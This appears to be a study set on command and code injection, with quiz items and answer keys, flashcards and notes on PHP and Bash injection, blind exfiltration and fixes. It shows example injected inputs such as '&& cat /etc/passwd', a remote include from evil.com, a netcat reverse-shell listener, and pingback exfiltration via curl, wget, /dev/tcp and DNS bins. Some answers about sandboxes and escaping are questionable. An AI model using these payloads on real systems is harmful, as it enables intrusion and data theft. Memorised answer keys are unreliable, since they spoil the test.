Command and Code Injections

Questions and Answers

Which of the following scenarios describes a circumstance where code/command execution flaws are most likely to arise?

• When strong password policies are enforced.
• When data transmission occurs over encrypted channels.
• When an application interprets or executes unsafe input. (correct)
• When network segmentation is properly implemented.

In the context of web security, what is the primary characteristic of an 'injection' vulnerability?

• The practice of regularly updating software to patch known security vulnerabilities.
• The process of encrypting sensitive data to prevent unauthorized access.
• The introduction of untrusted data into an interpreter, potentially leading to unintended commands or unauthorized data access. (correct)
• The technique of monitoring network traffic for malicious activities.

Consider a PHP application using the following code: system("ping " . $_GET['host']);. If the application lacks proper input sanitization, which of the following inputs for the host parameter represents a command injection vulnerability?

• example.com
• www.example.com
• example.com; ls -la (correct)
• 127.0.0.1

Bash and other system shells interpret certain characters as command separators. Besides the semicolon (;), which of the following is another character that can typically be used to inject commands in a Bash environment?

The newline character (\n) (C)

Within the context of command injection, what is the purpose of 'command substitution'?

To substitute commands enclosed in special delimiters with their output. (A)

In a black-box penetration testing scenario, what initial step is crucial when attempting to identify a command injection vulnerability?

Looking at the web application logic to find areas where external programs might be used and injecting special characters to see if the application behaves unexpectedly. (B)

When assessing a white-box environment for potential command injection flaws, what specific elements should security professionals prioritize?

Functions or statements within the code that execute system commands. (C)

If an application throws errors, what's a useful command to inject to identify code injection?

A non-existent command and look at the error. (D)

What is a "pingback" and how can it be used in the context of identifying command injection vulnerabilities?

A back-connection to a host that the tester controls, and a powerful way to verify if there are command injection flaws. (B)

When attempting to use a pingback to identify command injection flaws, which of the following techniques is most effective for initiating the necessary request to your designated host?

Use commonly installed programs like wget, curl, or netcat/telnet. (B)

In the context of command injection within Bash, what is the significance of the /dev/tcp/* special files?

They can be leveraged to open TCP connections using bash built-in capabilities. (A)

How can DNS queries be useful when validating command injection vulnerabilities, and what is a common approach for leveraging them?

DNS queries can validate command injections because they are hardly blacklisted on firewalls and they can be created using DNS bin sites. (D)

Given a Requestbin domain like *.d955264982a2216dc0c4.d.requestbin.net, how would you typically leverage this within a command injection payload to validate the vulnerability?

By replacing the * symbol with a string and issuing a DNS resolution. (C)

Within the context of command injection, what is meant by the term 'blind' command injection?

It refers to a command injection where the application produces no direct output. (B)

In scenarios involving blind command injection, what is a common technique for exfiltrating the output of the injected command?

Writing the output to a file on a directory reachable from the network. (C)

When dealing with blind command injection on a Linux system, how can an attacker redirect the output of a command to a publicly accessible file?

Using the > character to redirect the output to a file in a writable directory. (B)

When attempting to exfiltrate data via blind command injection, which directories are often writable and publicly reachable, making them prime targets for output redirection?

/static/ and /js/ (D)

Regarding out-of-band connections for blind command injection, which of the following techniques is a viable method?

Issuing the output of a command to a TCP/HTTP request. (C)

What is a potential command-line instruction to start listening for incoming connections on port 1337, effectively setting up a reverse shell?

nc -lvp 1337 (A)

What is the primary difference between command injection and code injection vulnerabilities?

Command injection exploits the operating system shell; code injection leverages the application interpreter. (C)

In scripting languages, what are the common entry points for code injection vulnerabilities?

Functions/language constructs that permit to evaluate code dynamically. (C)

Why is it important to know the language the application is written in when trying to find code injections?

Code injections are language dependent. (C)

Which special characters are commonly used in many languages to detect code injections?

Single and double quotes, and the escape character. (B)

In PHP, which statement is a frequent source of code injection vulnerabilities?

include (C)

What is local file inclusion (LFI)?

A type of injection that allows execution fo arbitrary PHP files on the filesystem if user supplied input is passed directly to the PHP include statement. (D)

In PHP code injection, what role do the tags <?php ... ?> play?

They are used to delimit PHP code so that arbitrary code can be executed if the tags are allowed/not sanitized. (C)

What is 'file poisoning' in the context of PHP code injection?

The act of writing data into a file so that PHP code can be injected. (A)

What should be the primary focus when creating a payload for file poisoning or file upload attacks?

Keep the payload as simple as possible and allow to execute arbitrary code. (A)

What broad strategy should be used to prevent most code and command injections?

Avoiding user input to system functions. (D)

If avoiding the use of user input is impossible, what mitigations could you take?

Using whitelists when possible and using a proper escaping function. (A)

In the context of preventing command injection vulnerabilities, what are the key characteristics and limitations of using a 'sandbox'?

Sandbox problems are that they can often be escaped from, and even tested ones are not always completely secure but it's an adequate method to prevent command injection. (C)

An application passes unsanitized user input to a system() call in PHP. The user provides the input example.com && cat /etc/passwd. What is the most likely outcome?

The system executes ping example.com and then attempts to execute cat /etc/passwd, potentially disclosing sensitive information. (D)

An application uses user-supplied data to construct a filename that is then passed to PHP's include() function. An attacker provides the filename http://evil.com/malicious_code.txt. What vulnerability can this lead to, and what is the most significant risk?

Remote File Inclusion (RFI), allowing the attacker to execute arbitrary code on the server. (B)

A web application allows users to upload images. However, it does not properly validate the uploaded files. An attacker uploads a file named evil.php containing PHP code. What is the most likely outcome?

The attacker can access evil.php directly through the web server, executing the embedded PHP code. (A)

A developer uses PHP's escapeshellarg() function to sanitize user input before passing it to a system command. Under what circumstance might this not be sufficient to prevent command injection?

When the system command being executed has its own vulnerabilities. (C)

A security analyst discovers that a system is vulnerable to command injection due to the improper use of the system() function in PHP. Which of the following steps would be MOST effective in remediating this vulnerability?

Rewrite the code to avoid using system() and employ PHP functions designed for the specific task. (C)

You are tasked with hardening a PHP application against code injection attacks. Which of the following practices is MOST important?

Escaping user-provided data with language-appropriate functions (e.g., mysqli_real_escape_string for SQL and htmlspecialchars for HTML). (A)

Flashcards

Command Injection

A flaw where a web application passes unsafe data to a system shell.

Command Separators

Special characters in bash, like ';', that allow multiple commands in one line.

Command Substitutions

A way to inject code by substituting commands with their output.

BlackBox Command Injection Detection

Inspect web application logic and look for external program calls.

WhiteBox Command Injection Detection

Identify functions/statements that execute system commands in the code.

Sleep Command Injection Test

A method to check for command injection by causing a delay.

Pingback for Injection Testing

Technique using back-connections to a controlled host to verify command injection.

DNS Pingback

A type of pingback that is less likely to be blocked by firewalls.

Blind Command Injection

A command injection with no visible output.

Output Redirection for Blind Injection

Redirecting command output to a publicly accessible file.

Out-of-Band Connection

Exfiltrating data using back-connections in blind command injection.

Reverse Shell

A connection initiated from the target to the attacker's machine.

Code Injection

A type of injection where the injected code is executed by the application's interpreter.

Code Injection Entry Points

Functions like eval, evaluate and assert

PHP Injection Points

PHP functions like include

Arbitrary PHP Execution

If user input is passed to include, it can execute arbitrary PHP files.

PHP Code injection

Injecting PHP code into a remote server via file uploads or file poisoning.

File Poisoning

Exploiting writeable files or logs for PHP code execution.

Simple code Injections

Simple code injections like

Input sanitation

Avoid user input, validate or use whitelists, use escaping functions

Study Notes

Introduction to Command and Code Injections

• Code or command execution is a common security vulnerability
• It occurs when untrusted data gets interpreted or executed by an application
• This can compromise data confidentiality, integrity, and availability
• Injection flaws happen when an application needs to use external programs or execute dynamic code

Command Injections

• Command injection happens when a web application passes unsafe data to a system shell
• Input sanitization is crucial, without it, attackers insert malicious commands
• Special characters in bash let users inject commands.
• Command separators include newline character (\n), and logic operators (&& and ||)
• Command substitutions involve substituting commands enclosed in special delimiters with output.
• The two main syntaxes are $(command) and command
• To find command injection flaws in a BlackBox, check the application logic and use special characters
• To find command injection flaws in a WhiteBox, look for functions that execute system commands
• Try injecting a non-existent command and look at the error
• Test the response time with a sleep command
• A pingback is a back-connection to a controlled host for verification
• Tools such as VPS or HTTP/TCP tunneling tools (like ngrok) facilitate pingbacks
• Commonly installed programs include wget, curl, or netcat/telnet can issue request
• TCP connections inject into bash using special files on /dev/tcp/* to send data
• DNS pingbacks validate command injections

Blind Command Injection

• A blind command injection lacks output
• Use network-reachable directories or out-of-bound connections to exfiltrate the output
• The character > redirects the output to a file
• There are directories that are commonly be writable and public-reachable
• They include static files, like /static/ and /js/
• They can be directories where users upload files
• Methods to use an out-of-bound connection include reverse shell, TCP/HTTP requests, or DNS bin
• Netcat is a reverse shell that exposes a TCP server on a public reachable server with nc -lvp 1337
• HTTP command substitution exfiltrates output

Code Injection

• Code injection works similarly to command injection
• The difference is the injected code executes via the application's interpreter
• Functions/language constructs that evaluate code dynamically are common entry points
• These functions include eval, evaluate, or assert
• Code injections are language dependent, and you need to know the application’s language
• Some special characters include quotes, backticks, dollar signs, and escape characters

PHP Code Injection

• PHP code injection has additional injection points other than the eval function
• A common pitfall is the include statement
• An attacker executes arbitrary PHP files on the filesystem via user-supplied input which is passed to the include statement
• This is called “local file inclusion (LFI)”
• PHP code, delimited by ``, can be injected
• The two main approaches are to use file uploads or file poisoning
• File poisoning is when a user writes data in a file.
• This can happen in system logs, because applications often implement logging
• System logs, like Nginx/Apache, are generally not readable by PHP
• This also happens in local database/ caching when applications stores user information inside a local file
• To execute PHP code, put a .php file inside a remote web directory
• This can happen when a file uploaded by a user are saved on an executable directory, without enforcing a name or an extension

Tips and Tricks

• Keep payloads simple when dealing with file poisoning or file uploads
• It is better to execute arbitrary code, rather than commands
• Commonly, the system-related functions are disabled/limited, so don’t use guess work
• If commands can be used, use them
• It is easier to use ls than coding a custom PHP function for directory listing

Fixes

• To fix code injections avoid using user input for system functions
• Avoid generating dynamic code from user input
• Validate user input with whitelists
• Use escaping functions, escapeshellarg from PHP
• Sandboxes offer limited execution environments